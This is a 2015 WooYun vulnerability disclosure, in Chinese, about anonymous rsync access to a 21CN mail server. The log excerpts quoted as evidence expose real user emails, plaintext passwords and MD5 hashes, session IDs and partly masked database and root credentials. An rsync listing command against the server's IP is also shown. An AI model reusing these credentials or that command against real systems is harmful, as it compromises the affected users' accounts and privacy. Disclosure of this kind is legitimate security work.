当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091383

漏洞标题:21CN邮箱某服务器RSYNC可匿名访问(DEBUG日志中包含用户密码)

相关厂商:世纪龙信息网络有限责任公司

漏洞作者: 猪猪侠

提交时间:2015-01-12 15:24

修复时间:2015-02-26 15:26

公开时间:2015-02-26 15:26

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-12: 细节已通知厂商并且等待厂商处理中
2015-01-12: 厂商已经确认,细节仅向厂商公开
2015-01-22: 细节向核心白帽子及相关领域专家公开
2015-02-01: 细节向普通白帽子公开
2015-02-11: 细节向实习白帽子公开
2015-02-26: 细节向公众公开

简要描述:

21CN邮箱某服务器RSYNC可匿名访问,全是邮件服务端产生的日志,邮箱的数据库信息就不说了,有一些脚本,一些日志啥的,要是有一些Cookie就不得了是吧?没错,里面的DEBUG日志记录了用户的密码

详细说明:

可能有些日志里面带有cookie,由于测试原因,就不看了

rsync 121.14.129.31:: -av
kbaslog kbaslog
kbaslogfjbnet kbaslog
kbaslogfree kbaslogfree
hermeslogent hermeslogent
aimclog aimclog
kbaslogent kbaslogent
kbaslogpay kbaslogpay
hermeslogfjbnet hermeslog
hermeslogfree hermeslogfree
hermeslogpay hermeslog for mta
medusalog kbas log
medusalogsmtp kbas log
medusalogweb kbas log
medusalogmta kbas log
enthermeslogguid hermeslogent
enthermesloglmtp hermeslogent
enthermeslogimap hermeslogent
enthermeslogmta hermeslogent
enthermeslogms hermeslogent
enthermeslogpop3 hermeslogent
enthermeslogud hermeslogent
enthermeslogwebmail hermeslogent
enthermeslogwebadmin hermeslogent
sync_as_log realtime antispam log
maillog1
maillog2
maillog3
maillog4
maillog5
zhenghe data zhenghe


webmail的日志

[2014-08-27 13:00:23,020] [INFO ] resin-tcp-connection-*:8081-79 MailListService - mail list: getLabelList end acc=yamamoto@108628,labelId=1,orderfield=0,orderway=68,page=1,lableList=[{summaryInfo,0,0,null}, {,1,0,{summaryInfo,0,0,null}}, {,2,0,{summaryInfo,0,0,null}}, {,3,0,{summaryInfo,0,0,null}}, {,4,0,{summaryInfo,0,0,null}}, {,5,0,{summaryInfo,0,0,null}}, {,6,0,{summaryInfo,0,0,null}}, {,7,0,{summaryInfo,0,0,null}}, {,8,0,{summaryInfo,0,0,null}}]
[2014-08-27 13:00:23,144] [INFO ] resin-tcp-connection-*:8081-45 ContactService - [cn21-contact-service : ContactService] -> account[spray@iktoy.com], password[spray2005], isWithoutAuth[false] ip[10.28.10.84], type[0] get contact.
[2014-08-27 13:07:17,695] [INFO ] resin-tcp-connection-*:8081-37 ContactService - [cn21-contact-service : ContactService] ->
mask 区域
*****1], isWithoutAuth[false] ip*****


21cnmail.jpg


DEBUG日志中包含用户密码

[2015-01-12 13:04:00,145] [DEBUG] tcpConnection-8080-5 HMMUdServer - execute UD command:emailAccount=chenjf32@1269,udId=46,commandId=1,param=AUTO_FORWARD=&OPERATION_FLAG=&LANGUAGE_ID=&IP=10.28.10.84&MAILBOX_MAX_SIZE=&WHITELIST=&MAIL_PER_PAGE=&TEMPLATE_ID=8&POP_SETTING=&CONTACT=&BLACKLIST=&FONT_ID=&AUTO_REPLY_MSG=&SIGNATURE=&SECRET_ANSWER=&COLOR_ID=&WARNING_QUOTA=&SEND_MAIL_NAME=&PASSWORD=&SECRET_QUESTION=,managerAccount=null,ret=AUTO_FORWARD=&SEND_MAIL_NAME=&CONTACT=&IP=&FONT_ID=0&SIGNATURE=&LANGUAGE_ID=0&SECRET_ANSWER=&TEMPLATE_ID=39&WARNING_QUOTA=0&BLACKLIST=&OPERATION_FLAG=8&POP_SETTING=&AUTO_REPLY_MSG=&WHITELIST=&MAIL_PER_PAGE=20&SECRET_QUESTION=&PASSWORD=%7BMD5%7D607d3b7eb6f521f22c7856df720a8462&MAILBOX_MAX_SIZE=1073741824&COLOR_ID=0
[2015-01-12 13:28:40,606] [DEBUG] tcpConnection-8080-6 UdAccoutManager - add usr sb=DEPARTMENT_ID=10040966&CITY_ID=0&CUSTOMER_NAME=tang.yanling%40jstars.cn&OPERATION_FLAG=216&ACCOUNT_STATUS=0&LANGUAGE_ID=0&MAILBOX_MAX_SIZE=1024&REMARK=&MAIL_PER_PAGE=20&TEMPLATE_ID=39&CONTACT_ADDRESS=&COMPANY_PHONE_NUMBER=&OU_ID=10040966&WARNING_QUOTA=0&PASSWORD=tangabc&BIRTHDAY=&OCCUPATION_NAME=&IP=10.28.10.84&PROVINCE_ID=0&ORG_ID=10111306&INVISIBLE=0&AGE_SESSION_ID=0&GENDER=0&CUSTOMER_SN=ÌÆÑÞÁá&GSM_NUMBER=&SEND_MAIL_NAME=ÌÆÑÞÁá&DOMAIN_ID=113083
[2015-01-12 13:27:30,347] [DEBUG] tcpConnection-8080-4 HMMUdServer - execute UD command:emailAccount=frank.han@15164,udId=38,commandId=1,param=AUTO_FORWARD=&OPERATION_FLAG=&LANGUAGE_ID=&IP=10.28.10.88&MAILBOX_MAX_SIZE=&WHITELIST=&MAIL_PER_PAGE=&TEMPLATE_ID=8&POP_SETTING=&CONTACT=&BLACKLIST=&FONT_ID=&A&IP=&FONT_ID=0&SIGNATURE=&LANGUAGE_ID=0&SECRET_ANSWER=&TEMPLATE_ID=39&WARNING_QUOTA=0&BLACKLIST=&OPERATION_FLAG=216&POP_SETTING=&AUTO_REPLY_MSG=&WHITELIST=&MAIL_PER_PAGE=20&SECRET_QUESTION=&PASSWORD=%7BMD5%7Dfa1105eab2c3cfefc46f478d083070b7&MAILBOX_MAX_SIZE=1073741824&COLOR_ID=0
LogonWebmailService - templateId ==== >39
[2015-01-12 13:27:30,363] [DEBUG] tcpConnection-8080-4 LogonWebmailService - Integer.toString(acc.getTemplateId())39
[2015-01-12 13:27:30,364] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,364] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,COLOR_ID,0) ret:1
[2015-01-12 13:27:30,365] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,366] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,FONT_ID,0) ret:1
[2015-01-12 13:27:30,367] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,368] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,WARNING_QUOTA,0) ret:1
[2015-01-12 13:27:30,428] [DEBUG] tcpConnection-8080-4 HMMSessionServer - HMMSessionServer.setObjectValue(CONTACT) use time: 51 ms
[2015-01-12 13:27:30,428] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,437] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,CONTACT,com.cn21.util.Contact@5d7f9a29) ret:1
[2015-01-12 13:27:30,438] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,439] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,OPERATION_FLAG,216) ret:1
[2015-01-12 13:27:30,440] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,440] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,MAILBOX_MAX_SIZE,1073741824) ret:1
[2015-01-12 13:27:30,441] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,442] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,DEF_CHARSET,gb2312) ret:1
[2015-01-12 13:27:30,443] [DEBUG] tcpConnection-8080-4 JedisService - get redis successed in time 0
[2015-01-12 13:27:30,443] [DEBUG] tcpConnection-8080-4 JedisClient - hset(000001854359872-20150112052730334277-025,PASSWORD,{MD5}fa1105eab2c3cfefc46f478d083070b7) ret:1


邮箱服务端的数据库连接信息

[2015-01-12 11:00:01,683] [INFO ] 3086404160 ApplicationContext - name:ms-index-
mask 区域
*****r:=hermes;password:=quy*****


[2015-01-12 11:02:02,079] [INFO ] 3086559808 ApplicationContext - name:hermes,server:=HERMES-DG-FP;
mask 区域
*****pmail_0958;driver:=oracle;ch*****


[2015-01-12 11:02:02,080] [INFO ] 3086559808 ApplicationContext - name:,server:=;database:=;user:=;password:=;driver:=;charset:=
[2015-01-12 11:02:02,081] [INFO ] 3086559808 ApplicationContext -

mask 区域
*****rd:=pwd_liyang_1234;driver:=oracle;c*****


<code>-rw-r----- 225598 2015/01/02 11:32:10 pop3.2015010210.ent-ssl3.log
-rw-r----- 26487483 2015/01/02 11:08:03 pop3.2015010210.ent13.log
-rw-r----- 26864900 2015/01/02 11:07:11 pop3.2015010210.ent14.log
-rw-r----- 1137000 2015/01/02 11:23:29 pop3.2015010210.ent15.log
-rw-r----- 1150282 2015/01/02 11:24:29 pop3.2015010210.ent16.log
-rw-r----- 8295510 2015/01/02 11:23:30 pop3.2015010210.ent3.log
-rw-r----- 8287110 2015/01/02 11:15:20 pop3.2015010210.ent7.log
-rw-r----- 2529009 2015/01/02 11:14:03 pop3.2015010210.zment-mta1.log
-rw-r----- 1333687 2015/01/02 11:14:09 pop3.2015010210.zment-mta2.log
-rw-r----- 1813795 2015/01/02 11:14:03 pop3.2015010210.zment-mta3.log
-rw-r----- 1398126 2015/01/02 11:14:02 pop3.2015010210.zment-mua1.log
-rw-r----- 3335943 2015/01/02 11:14:04 pop3.2015010210.zment-mua2.log
-rw-r----- 1506940 2015/01/02 11:14:05 pop3.2015010210.zment-mua3.log
-rw-r----- 26560591 2015/01/02 12:29:04 pop3.2015010211.ent-pop1.log
-rw-r----- 26761625 2015/01/02 12:33:04 pop3.2015010211.ent-pop2.log
-rw-r----- 26613621 2015/01/02 12:36:05 pop3.2015010211.ent-pop3.log
-rw-r----- 26745745 2015/01/02 12:20:04 pop3.2015010211.ent-pop4.log
-rw-r----- 26528333 2015/01/02 12:23:03 pop3.2015010211.ent-pop5.log
-rw-r----- 27186101 2015/01/02 12:27:26 pop3.2015010211.ent-pop6.log
-rw-r----- 26893325 2015/01/02 12:27:25 pop3.2015010211.ent-pop7.log
-rw-r----- 27015790 2015/01/02 12:27:28 pop3.2015010211.ent-pop8.log
-rw-r----- 372101 2015/01/02 12:32:10 pop3.2015010211.ent-ssl1.log
-rw-r----- 78252 2015/01/02 12:32:10 pop3.2015010211.ent-ssl2.log
-rw-r----- 225263 2015/01/02 12:32:11 pop3.2015010211.ent-ssl3.log


-rwxr-xr-x       49966 2014/08/21 05:18:01 webmail.2014082104.ent-web2.log.gz
-rwxr-xr-x 58232 2014/08/21 05:21:01 webmail.2014082104.ent-web3.log.gz
-rwxr-xr-x 44895 2014/08/21 05:20:01 webmail.2014082104.ent-web4.log.gz
-rwxr-xr-x 60459 2014/08/21 05:17:01 webmail.2014082104.ent-web5.log.gz
-rwxr-xr-x 36185 2014/08/21 05:19:01 webmail.2014082104.ent-web6.log.gz
-rwxr-xr-x 49 2014/08/21 05:15:11 webmail.2014082104.ent13.log.gz
-rwxr-xr-x 3643 2014/08/21 05:18:20 webmail.2014082104.ent14.log.gz
-rwxr-xr-x 78131 2014/08/21 06:19:01 webmail.2014082105.ent-web1.log.gz
-rwxr-xr-x 42267 2014/08/21 06:18:01 webmail.2014082105.ent-web2.log.gz
-rwxr-xr-x 66315 2014/08/21 06:21:01 webmail.2014082105.ent-web3.log.gz
-rwxr-xr-x 60599 2014/08/21 06:20:01 webmail.2014082105.ent-web4.log.gz
-rwxr-xr-x 28964 2014/08/21 06:17:01 webmail.2014082105.ent-web5.log.gz
-rwxr-xr-x 67922 2014/08/21 06:19:01 webmail.2014082105.ent-web6.log.gz
-rwxr-xr-x 49 2014/08/21 06:15:11 webmail.2014082105.ent13.log.gz
-rwxr-xr-x 3611 2014/08/21 06:15:11 webmail.2014082105.ent14.log.gz
-rwxr-xr-x 166159 2014/08/21 07:19:01 webmail.2014082106.ent-web1.log.gz
-rwxr-xr-x 80258 2014/08/21 07:18:01 webmail.2014082106.ent-web2.log.gz
-rwxr-xr-x 94664 2014/08/21 07:21:01 webmail.2014082106.ent-web3.log.gz
-rwxr-xr-x 86146 2014/08/21 07:20:02 webmail.2014082106.ent-web4.log.gz
-rwxr-xr-x 51431 2014/08/21 07:17:01 webmail.2014082106.ent-web5.log.gz
-rwxr-xr-x 79683 2014/08/21 07:19:01 webmail.2014082106.ent-web6.log.gz
-rwxr-xr-x 49 2014/08/21 07:15:11 webmail.2014082106.ent13.log.gz
-rwxr-xr-x 3639 2014/08/21 07:15:11 webmail.2014082106.ent14.log.gz
-rwxr-xr-x 306795 2014/08/21 08:19:02 webmail.2014082107.ent-web1.log.gz
-rwxr-xr-x 255794 2014/08/21 08:18:02 webmail.2014082107.ent-web2.log.gz
-rwxr-xr-x 244959 2014/08/21 08:21:02 webmail.2014082107.ent-web3.log.gz
-rwxr-xr-x 286663 2014/08/21 08:20:01 webmail.2014082107.ent-web4.log.gz
-rwxr-xr-x 207918 2014/08/21 08:17:02 webmail.2014082107.ent-web5.log.gz
-rwxr-xr-x 235922 2014/08/21 08:19:01 webmail.2014082107.ent-web6.log.gz


[2014-08-21 07:59:27,456] [INFO ] resin-tcp-connection-*:8081-104 MtaServerConfig - func[getMTAConnection] heloMta[60.21.200.227] MtaServerConfig[{smtpent-web.inner-hermes.com,2027,smtp,1}] desc[reconect using helo ip success]
[2014-08-21 07:59:34,868] [INFO ] resin-tcp-connection-*:8081-42 LoginActionAjax - func[singinajax] account[weihong5@cnweihong.com] jsoncallback[jQuery171027891063959938317_1408579316062] action[start login]
[2014-08-21 07:59:34,904] [INFO ] resin-tcp-connection-*:8081-42 LoginActionAjax - func[singinajax] account[weihong5@cnweihong.com] jsoncallback[jQuery171027891063959938317_1408579316062] action[start end]
[2014-08-21 07:59:34,910] [INFO ] resin-tcp-connection-*:8081-104 HMMMtaServer - func[sendJavaMail] heloMta[60.21.200.227] MtaServerConfig[{smtpent-web.inner-hermes.com,2027,smtp,1}] mailInfo[{subject:Re: LN014·¿×â²î¼þ, fromList:jason.yang@vmartcn.com, toList:"wen.zhang" <wen.zhang@vmartcn.com>, size:1202555, attachmentList:[ÉÌÒµ×âÁÞÊý¾Ý±í_LN014.pdf, Liao_Ning_LN014_ÃÉÏéºì_B_to_A.pdf, ·¿ÎÝ×âÁÞºÏͬ¶þ.pdf, ·¿ÎÝ×âÁÞºÏͬһ.pdf], hashCode:11065350}] transPort[smtp://hermes@smtpent-web.inner-hermes.com] desc[send mail success]
[2014-08-21 07:59:34,914] [WARN ] resin-tcp-connection-*:8081-104 SendMailService - func[deleteAutoSaveDraft] oldMessageId[] oldMsId[] emailAccount[jason.yang@119040] udId[38] transId[10.28.10.87:147f5dc8201:7715]
[2014-08-21 07:59:35,023] [INFO ] resin-tcp-connection-*:8081-104 SendMailService - save sended mail size=1652629
[2014-08-21 07:59:35,031] [INFO ] resin-tcp-connection-*:8081-104 HMMUdServer - nativeUdCreateMail mail:Re: LN014·¿×â²î¼þreturn:<0>
[2014-08-21 07:59:35,031] [INFO ] resin-tcp-connection-*:8081-104 SendMailService - save sended mail:ACC=<jason.yang@119040>,MID=<200.10.28.10.87.14085791749140.jason.yang@119040>,MSID=<37>,TID=<10.28.10.87:147f5dc8201:7715>,RDN=<0>
[2014-08-21 07:59:35,439] [INFO ] resin-tcp-connection-*:8081-104 SendMailFlashAction - jason.yang@119040 action end.
[2014-08-21 07:59:35,820] [ERROR] resin-tcp-connection-*:8081-108 GetMailListAction - com.cn21.hermes.exception.SessionException: <SESSION>:8153(error code=8153)
[2014-08-21 07:59:36,363] [INFO ] resin-tcp-connection-*:8081-80 MailReadStatusService - func[getMailStatusById] messageId=<<434954191.6641408577882022.JavaMail.hermes@ent-web3>>,mailAuthor=<xiangliping@leaderchina.cn>,chgTime=<2014-08-21 07:38:05.0>,clientIp=<10.28.10.88>
[2014-08-21 07:59:36,364] [INFO ] resin-tcp-connection-*:8081-80 TrackMailDBPool - -----------TrackMailDBPool.getConnection getTotalCreatedConnections:8 getTotalFree:8 getTotalLeased:0
[2014-08-21 07:59:38,830] [ERROR] resin-tcp-connection-*:8081-80 GetMailListAction - com.cn21.hermes.exception.SessionException: <SESSION>:8153(error code=8153)
[2014-08-21 07:59:39,875] [INFO ] resin-tcp-connection-*:8081-108 SignOnAction - Could not get sid from Cookies
[2014-08-21 07:59:39,875] [INFO ] resin-tcp-connection-*:8081-108 cn21 - 10.28.10.87 session timeout!
[2014-08-21 07:59:41,291] [INFO ] resin-tcp-connection-*:8081-42 chk - check service begin ...
[2014-08-21 07:59:41,360] [INFO ] resin-tcp-connection-*:8081-42 chk - echeck service ok.
[2014-08-21 07:59:41,375] [INFO ] resin-tcp-connection-*:8081-36 LoginServlet - func<parserUrlGetDomain> cookieDomain<.21cn.com>
[2014-08-21 07:59:41,375] [INFO ] resin-tcp-connection-*:8081-36 LoginServlet - customer_url_domain<>
[2014-08-21 07:59:41,390] [INFO ] resin-tcp-connection-*:8081-36 MailMigrationManager - yyhfm.com not need to pop or imap verify
[2014-08-21 07:59:41,391] [INFO ] resin-tcp-connection-*:8081-36 UDCorpMailAuthenticator - logon: acc=hfmould@yyhfm.com
[2014-08-21 07:59:41,391] [INFO ] resin-tcp-connection-*:8081-36 UDCorpMailAuthenticator - get GUID.acc=<hfmould@yyhfm.com>,ip=<101.71.150.246>
[2014-08-21 07:59:41,394] [INFO ] resin-tcp-connection-*:8081-36 UDCorpMailAuthenticator - accWithDomainId<hfmould@126861> webFlag<1>
[2014-08-21 07:59:41,394] [INFO ] resin-tcp-connection-*:8081-36 UDCorpMailAuthenticator - acc=<hfmould@126861>,domainStatus=<1>
[2014-08-21 07:59:41,394] [INFO ] resin-tcp-connection-*:8081-36 UDCorpMailAuthenticator - auth UD.acc=<hfmould@126861>,udId=<37>, ip=<101.71.150.246>
[2014-08-21 07:59:41,443] [WARN ] resin-tcp-connection-*:8081-36 MobileSecurityDAO - func[getMobileSecurityInfo] not find record! msg : <UD>DataNotFound.
[2014-08-21 07:59:41,457] [INFO ] resin-tcp-connection-*:8081-36 SSOLoginner - SSOLogon corp.webmail.21cn.com], referer:[http://corp.webmail.21cn.com/webmail/signOn.do], sslLogin:[null]
[2014-08-21 07:59:41,458] [INFO ] resin-tcp-connection-*:8081-36 CookieUtils - userDatauid =< 111111> userDatauid oldUserName =<hfmould@yyhfm.com>,result=<1>
[2014-08-21 07:59:41,458] [INFO ] resin-tcp-connection-*:8081-36 SSOLoginner - logon: sid=<000002050480448-20140820235941440958-020> EmailAccountName : hfmould DomainName : yyhfm.com DomainId : 126861 UdId : 37 cookies : .21cn.com
[2014-08-21 07:59:41,463] [INFO ] resin-tcp-connection-*:8081-36 SSOLoginner - domain:===============ent-web1_mailhost
[2014-08-21 07:59:41,463] [INFO ] resin-tcp-connection-*:8081-36 SSOLoginner - iAddr =<ent-web1/127.0.0.1>,host=< ent-web1>, URL=< http://corp.webmail.21cn.com/webmail/forwardlogin.jsp>, account =<hfmould@yyhfm.com> redirectUrl : http://corp.webmail.21cn.com/webmail/forwardlogin.jsp
[2014-08-21 07:59:41,779] [INFO ] resin-tcp-connection-*:8081-128 LogonAction - logging on from ip=<10.28.10.87>,accountName=null
[2014-08-21 07:59:41,779] [INFO ] resin-tcp-connection-*:8081-128 LogonAction - uudSessionId ====================== 000002050480448-20140820235941440958-020
[2014-08-21 07:59:41,782] [INFO ] resin-tcp-connection-*:8081-128 LogonService - alanstart==1408579181782
[2014-08-21 07:59:41,782] [INFO ] resin-tcp-connection-*:8081-128 LogonService - logon: acc=hfmould@yyhfm.com
[2014-08-21 07:59:41,785] [INFO ] resin-tcp-connection-*:8081-128 LogonService - getDefaultTemplateId == 39
[2014-08-21 07:59:41,785] [INFO ] resin-tcp-connection-*:8081-128 LogonService - set UD TemplateId =>> 39


[2015-01-12 11:00:01,300] [INFO ] 3086404160 config - parse /opt/hermes/bin/../conf/corpmail_edf.xml
[2015-01-12 11:00:01,315] [INFO ] 3086404160 config - parse end
[2015-01-12 11:00:01,315] [INFO ] 3086404160 ApplicationContext - init,args[/opt/hermes/bin/../libexec/hmm_pop3_app -t server -a pop3 -s pop3-svr7 -c /opt/hermes/bin/../conf/corpmail_edf.xml -l /opt/hermes/bin/../conf/pop3_log.xml ] begin

漏洞证明:

10.27.10.232
10.27.10.226


服务器密码也泄露了
cat scp_block.sh

#!/bin/sh
list_file=/opt/chenlh/tuixintongzhi/host.txt
username=root
password="!@*****()"
#src_file=/opt/idns/local.dat
dest_file=/opt/chenlh/
line=result
cat $list_file | while read host
do
./expect_scp $host $username $password $line $dest_file$line
done


cat 1.sh

#!/bin/sh
WORKPATH=/maillog1/hermeslog/ent/mta
time1=`date -d "+1 days ago" +%Y%m%d`
cat /dev/null > tuixin.log
cat /dev/null > deferred.tmp
cat /dev/null > bounce.total
for i in 7 8 9 10 11 12 17 18 19 20
do
cat $WORKPATH/mta.$time1*ent$i.log* >> tuixin.log
done
grep "status=deferred" tuixin.log >deferred.log
cat /dev/null > bounce.total
grep "deferred" tuixin.log | grep -E "lost connection|time out|timed out"|grep -v "127.0.0.1" | awk -F: '{print $4}' | sed 's/^ //'| sort -u >> deferred.tmp
grep "bounce mail" tuixin.log | grep -oP '(?<=queue_id\[)[^]]+' | sort -u >> bounce.total
grep -xFf deferred.tmp bounce.total >> total.net
while read queue_id
do
grep "$queue_id" deferred.log| grep -E "lost connect|time out|timed out"|grep -vE "21cn.com|127.0.0.1" | sort -u -k 6,6 >> net.log
done < total.net
grep "status=bounced" tuixin.log | grep -E "not allowed to connect|blocked using|refused to talk to|rejected due to the sending|is listed in|blacklist|Client host rejected" | grep -vE "127.0.0.1|trace_id" >> rbl.log

修复方案:

IP授权

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-12 23:22

厂商回复:

已确认

最新状态:

暂无